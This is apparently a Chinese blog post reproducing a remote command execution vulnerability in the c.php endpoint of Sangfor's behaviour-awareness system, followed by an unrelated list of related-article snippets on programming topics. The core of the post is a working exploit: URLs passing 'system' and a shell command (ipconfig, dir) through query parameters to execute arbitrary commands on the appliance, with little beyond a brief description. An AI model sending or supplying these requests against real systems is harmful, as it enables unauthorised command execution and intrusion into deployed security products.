深信服行为感知命令执行漏洞

news/2024/11/19 18:43:46/

深信服行为感知命令执行漏洞

  • 1.深信服行为感知漏洞
    • 1.1.漏洞描述
    • 1.2.漏洞影响
    • 1.3.漏洞复现
      • 1.3.1.登录页面
      • 1.3.2.构建漏洞URL
        • 1.3.2.1.查询IP地址
        • 1.3.2.2.查询当前目录下文件

1.深信服行为感知漏洞

1.1.漏洞描述

  深信服 行为感知系统c.php远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行。

1.2.漏洞影响

  深信服行为感知系统

1.3.漏洞复现

  其实整个过程和深信服EDR命令执行漏洞差不多。

1.3.1.登录页面

在这里插入图片描述

1.3.2.构建漏洞URL

  其实整个URL和EDR差不多。

URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=ipconfig

1.3.2.1.查询IP地址

URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=ipconfig

在这里插入图片描述

1.3.2.2.查询当前目录下文件

URL:https://IP地址/tool/log/c.php?strip_slashes=system&host=dir

在这里插入图片描述


http://www.ppmy.cn/news/18829.html

相关文章

创建者模式-原型模式

1.概述 用一个已经创建的实例作为原型,通过复制该原型对象来创建一个和原型对象相同的新对象 2.结构 原型模式包含如下角色: 抽象原型类:规定了具体原型对象必须实现的的 clone() 方法。具体原型类:实现抽象原型类的 clone() …

liunx centos9安装nodejs并搭建vue 图文详解手把手教程

首先nodjs的官网找到liunx的安装包 https://nodejs.org/en/download/ 这里不推荐用源码安装,因为实在太慢,我安装时一下在不停安装连续15分钟都还在跑就是不知道什么原因 解压包 tar -xvf /root/node-v18.13.0-linux-x64.tar.xz设置全局 -s后面地址就是…

07 | 应届生身份为什么重要?只有一次

文章目录一、应届生身份的划分1、企业角度2、学校角度3、国家角度二、应届生身份的重要性1、国考/省考2、企业招聘3、落户政策4、签约保障一、应届生身份的划分 国家统一招生的高校毕业生离校时,和在择业期内(国家规定择业期为两年)未落实工…

Java基础之《netty(29)—自定义协议解决TCP粘包拆包》

一、TCP粘包和拆包解决方案 1、使用自定义协议 编解码器,来解决。 2、关键就是要解决,服务器端每次读取数据长度的问题。这个问题解决,就不会出现服务器多读或少读数据的问题,从而避免TCP粘包、拆包。 二、具体示例 1、要求客…

Kettle(4):excel数据抽取到mysql

1 准备工作 1.1 准备Excel文件 我这边直接使用上一篇导出的excel:file_user.xls 1.2 创建数据库 在mysql中创建数据库 1.3 在kettle中加载MySQL驱动 Kettle要想连接到MySQL,必须要安装一个MySQL的驱动,就好比我们装完操作系统要安装显卡驱动一样。加…

Python技能树-推导式

Python 列表推导式(1) Python 独步天下的推导式表达式,使用列表推导式过滤出偶数列表 # -*- coding: UTF-8 -*- if __name__ __main__:list [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]print()print("# 使用列表推导式过滤出偶数")# TODO(you): 请在此实现过滤代…

Day867.事务隔离 -MySQL实战

事务隔离 Hi,我是阿昌,今天学习记录的是关于事务隔离的内容。 提到事务,肯定不陌生,和数据库打交道的时候,总是会用到事务。 最经典的例子就是转账,你要给朋友小王转 100 块钱,而此时你的银行…

操作系统真相还原_第5章第2节:内存分页机制

文章目录分段机制分页机制一级页表二级页表启用分页机制的过程启用分页机制(二级页表)详解程序include.incmbr.sloader.s写入硬盘启动bochs执行分段机制 分页机制 一级页表 二级页表 启用分页机制的过程 1、准备好页目录项及页表 2、将页表地址写入控制寄存器cr3 3、寄存器cr0…